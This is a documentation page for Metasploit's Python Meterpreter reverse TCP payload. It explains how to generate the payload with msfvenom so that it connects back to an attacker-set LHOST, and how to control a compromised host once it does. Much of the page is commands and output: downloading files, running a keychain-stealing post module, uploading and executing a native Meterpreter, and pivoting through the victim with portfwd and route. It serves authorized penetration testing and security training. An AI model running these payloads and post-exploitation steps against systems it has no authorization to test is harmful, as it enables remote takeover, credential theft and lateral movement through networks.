Python Meterpreter, Python Reverse TCP Stager - Metasploit
This page contains detailed information about how to use the payload/python/meterpreter/reverse_tcp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Deploying python/meterpreter/reverse_tcp
- Important Basic Commands
- Using a Post Module
- Using the Post Exploitation API in IRB
- Switching to a Native Meterpreter
- Routing through the portfwd command
- Routing through msfconsole
- Msfconsole Usage
- Related Pull Requests
- See Also
- Authors
- Version
Module Overview
Name: Python Meterpreter, Python Reverse TCP Stager
Module: payload/python/meterpreter/reverse_tcp
Source code: modules/payloads/stagers/python/reverse_tcp.rb
Disclosure date: -
Last modification time: 2021-01-05 14:59:46 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use payload/python/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
... show and set options ...
msf payload(reverse_tcp) > generate
To learn how to generate payload/python/meterpreter/reverse_tcp with msfvenom, please read this.
Required Options
- LHOST: The listen address (an interface may be specified)
Knowledge Base
python/meterpreter/reverse_tcp allows you to remotely control the compromised system. It is a unique payload to the Metasploit Framework, because it is cross-platform. And since Python is a very popular programming language, some operating systems such as Ubuntu even support it by default.
When using an exploit, using a cross-platform payload like python/meterpreter/reverse_tcp also means you don't need to worry about which target/platform to select, the payload should work for all of them.
Vulnerable Application
The Python Meterpreter is suitable for any systems that support Python. Some operating systems such as Ubuntu, Debian, Arch Linux, and OS X have it by default. The Python Meterpreter supports the CPython implementation versions 2.5-2.7 and 3.1+.
Deploying python/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp is typically used in two different ways.
First, it can be used with an exploit as long as the Python platform is supported. This sort
of information can usually be found when you use the info
command like this:
msf exploit(ms14_064_packager_python) > info
Name: MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
Module: exploit/windows/fileformat/ms14_064_packager_python
Platform: Python
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-11-12
.... more info here ...
Or, you can check the exploit's target list by doing show targets
, there might be Python
on the list.
If your exploit supports Python, here is how to load it:
- In msfconsole, select the exploit.
- Configure the options for that exploit.
- Do:
set PAYLOAD python/meterpreter/reverse_tcp
- Set the
LHOST
datastore option, which is the IP that the payload should connect to. - Do
exploit
. If the exploit is successful, it should execute that payload.
Another way to use the Python Meterpreter is to generate it as a Python file. Normally, you would want to do this with msfvenom, like this:
./msfvenom -p python/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/python.py
Important Basic Commands
Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the Python Meterpreter has less commands, but here's a list of all the common ones you might need:
pwd command
The pwd
command tells you the current working directory. For example:
meterpreter > pwd
/Users/sinn3r/Desktop
cd command
The cd
command allows you to change directories. Example:
meterpreter > cd /Users/sinn3r/Desktop
meterpreter > pwd
/Users/sinn3r/Desktop
cat command
The cat
command allows you to see the content of a file:
meterpreter > cat /tmp/data.txt
Hello World!
upload command
The upload
command allows you to upload a file to the remote target. For example:
meterpreter > upload /tmp/data.txt /Users/sinn3r/Desktop
[*] uploading : /tmp/data.txt -> /Users/sinn3r/Desktop
[*] uploaded : /tmp/data.txt -> /Users/sinn3r/Desktop/data.txt
meterpreter >
download command
The download
command allows you to download a file from the remote target to your machine.
For example:
meterpreter > download /Users/sinn3r/Desktop/data.txt /tmp/pass.txt
[*] downloading: /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
[*] download : /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
meterpreter >
search command
The search
command allows you to find files on the remote file system. For example,
this shows how to find all text files in the current directory:
meterpreter > search -d . -f *.txt
Found 2 results...
.\pass.txt (13 bytes)
./creds\data.txt (83 bytes)
meterpreter >
Without the -d
option, the command will attempt to search in all drives.
The -r
option for the command allows you to search recursively.
getuid command
The getuid
command tells you the current user that Meterpreter is running on. For example:
meterpreter > getuid
Server username: root
execute command
The execute
command allows you to execute a command or file on the remote machine.
The following examples uses the command to create a text file:
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 73642 created.
meterpreter >
ps command
The ps
command lists the running processes on the remote machine.
shell command
The shell
command allows you to interact with the remote machine's command prompt (or shell).
For example:
meterpreter > shell
Process 74513 created.
Channel 2 created.
sh-3.2#
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
sysinfo
The sysinfo
command shows you basic information about the remote machine. Such as:
- Computer name
- OS name
- Architecture
- Meterpreter type
Using a Post Module
One of the best things about Meterprter is you have access to a variety of post modules that "shell" sessions might not have. Post modules provide you with more capabilities to collect data from the remote machine automatically. For example, stealing credentials from the system or third-party applications, or modify settings, etc.
To use a post module from the Meterpreter prompt, simply use the run
command. The following
is an example of collecting OS X keychain information using the enum_keychain post module:
meterpreter > run post/osx/gather/enum_keychain
[*] The following keychains for root were found:
"/Users/sinn3r/Library/Keychains/login.keychain"
"/Library/Keychains/System.keychain"
[+] 192.168.1.209:58023 - Keychain information saved in /Users/sinn3r/.msf4/loot/20160705211412_http_192.168.1.209_macosx.keychain._271980.txt
meterpreter >
Using the Post Exploitation API in IRB
To enter IRB, do the following at the Meterpreter prompt:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
The client object
The client object in Meterpreter allows you to control or retrieve information about the host. For example, this allows you to get the current privilege our payload is running as:
>> client.sys.config.getuid
=> "root"
To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it:
>> client.inspect
You can also use the #methods method to see what methods you can use:
>> client.methods
To review the source of the method, you can use the #source_location method. For example, say we want to see the source code for the #getuid method:
>> client.sys.config.method(:getuid).source_location
=> ["/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32]
The first element of the array is the location of the file. The second is the line number of the method.
Railgun
If you are familiar with using the post exploitation API for Windows, you probably know about Railgun. Unfortunately, Railgun is not available in Python Meterpreters.
Switching to a Native Meterpreter
The Python Meterpreter currently does not quite have the same strength as a native Meterpreter, therefore there are times you will want to migrate to a native one to expose yourself with more features.
There are many ways to migrate to a native Meterpreter, some common approaches:
Example 1: Upload and Execute
Step 1: Produce a native Meterpreter, such as:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=5555 -f exe -o /tmp/native.exe
Step 2: Start another handler for the native payload:
./msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST [IP]; set LPORT 5555; run"
Step 3: Upload the native via the Python Meterpreter session:
meterpreter > upload /tmp/native.exe C:\\Users\\sinn3r\\Desktop
[*] uploading : /tmp/native.exe -> C:\Users\sinn3r\Desktop
[*] uploaded : /tmp/native.exe -> C:\Users\sinn3r\Desktop\native.exe
meterpreter >
Step 4: Execute the native payload:
meterpreter > execute -H -f C:\\Users\\sinn3r\\Desktop\\native.exe
Process 2764 created.
And then your other handler (for the native payload) should receive that session:
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.1.220
[*] Meterpreter session 1 opened (192.168.1.209:5555 -> 192.168.1.220:49306) at 2016-07-05 21:48:04 -0500
meterpreter > sysinfo
Computer : WIN-6NH0Q8CJQVM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >
Example 2: Using exploit/multi/script/web_delivery
Another way to migrate to a native Meterpreter is by using the exploit/multi/script/web_delivery module. To learn how, please read the module documentation for that module.
Routing through the portfwd command
The portfwd command allows you to talk to a remote service like it's local. For example, if you cannot talk to the SMB service remotely on the compromised host because it is firewalled, then you can use portfwd to establish that tunnel:
meterpreter > portfwd add -l 445 -p 445 -r 192.168.1.220
[*] Local TCP relay created: :445 <-> 192.168.1.220:445
meterpreter > portfwd
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:445 192.168.1.220:445 Forward
And then talk to it like it's a local service:
msf auxiliary(smb_version) > run
[*] 127.0.0.1:445 - Host is running Windows 7 Ultimate SP1 (build:7601)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Routing through msfconsole
The route command from the msf prompt can also be used to bypass firewall like portfwd, but it also allows you to connect to hosts on a different network through the compromised machine.
To do that, first off, look at the ifconfig/ipconfig output and determine your pivot point:
meterpreter > ipconfig
Make sure you know the subnet, netmask, and the Meterpreter/session ID. Return to the msf prompt, and establish that route:
msf > route add 192.168.1.0 255.255.255.0 1
At that point, you should have a working pivot. You can use other Metasploit modules to explore or exploit more hosts on the network, or use auxiliary/server/socks4a and Proxychains to allow other third-party tools to do the same.
Go back to menu.
Msfconsole Usage
Here is how the python/meterpreter/reverse_tcp payload looks in the msfconsole:
msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > show info
Name: Python Meterpreter, Python Reverse TCP Stager
Module: payload/python/meterpreter/reverse_tcp
Platform: Python
Arch: python
Needs Admin: No
Total size: 481
Rank: Normal
Provided by:
Spencer McIntyre
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).
Connect back to the attacker
Module Options
This is a complete list of options available in the python/meterpreter/reverse_tcp payload:
msf6 payload(python/meterpreter/reverse_tcp) > show options
Module options (payload/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Advanced Options
Here is a complete list of advanced options supported by the python/meterpreter/reverse_tcp payload:
msf6 payload(python/meterpreter/reverse_tcp) > show advanced
Module advanced options (payload/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterTryToFork true no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PythonMeterpreterDebug false no Enable debugging for the Python meterpreter
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Go back to menu.
Related Pull Requests
- #14584 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/base
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #13978 Merged Pull Request: Add proxy authentication support to the Python Meterpreter
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #8293 Merged Pull Request: Multi-Platform Railgun Support
- #7634 Merged Pull Request: Implement universal HTTP/S handlers for Meterpreter payloads
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6120 Merged Pull Request: Stageless TCP Python Meterpreter
- #5898 Merged Pull Request: finish move of php / python meterpreters to metasploit-payloads
- #5654 Merged Pull Request: Python Meterpreter Transport
- #5367 Merged Pull Request: Create new UUID stagers
- #3411 Merged Pull Request: Python Meterpreter Support For Python Versions 3.3/3.4
- #2525 Merged Pull Request: Change module boilerplate
- #2244 Merged Pull Request: Python Meterpreter
Go back to menu.
See Also
Check also the following modules related to this module:
- payload/python/meterpreter/bind_tcp
- payload/python/meterpreter_bind_tcp
- payload/python/meterpreter/bind_tcp_uuid
- payload/python/meterpreter/reverse_http
- payload/python/meterpreter_reverse_http
- payload/python/meterpreter/reverse_https
- payload/python/meterpreter_reverse_https
- payload/python/meterpreter_reverse_tcp
- payload/python/meterpreter/reverse_tcp_ssl
- payload/python/meterpreter/reverse_tcp_uuid
- payload/python/pingback_bind_tcp
- payload/python/pingback_reverse_tcp
- payload/python/shell_bind_tcp
- payload/python/shell_reverse_tcp
- payload/python/shell_reverse_tcp_ssl
- payload/python/shell_reverse_udp
Authors
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.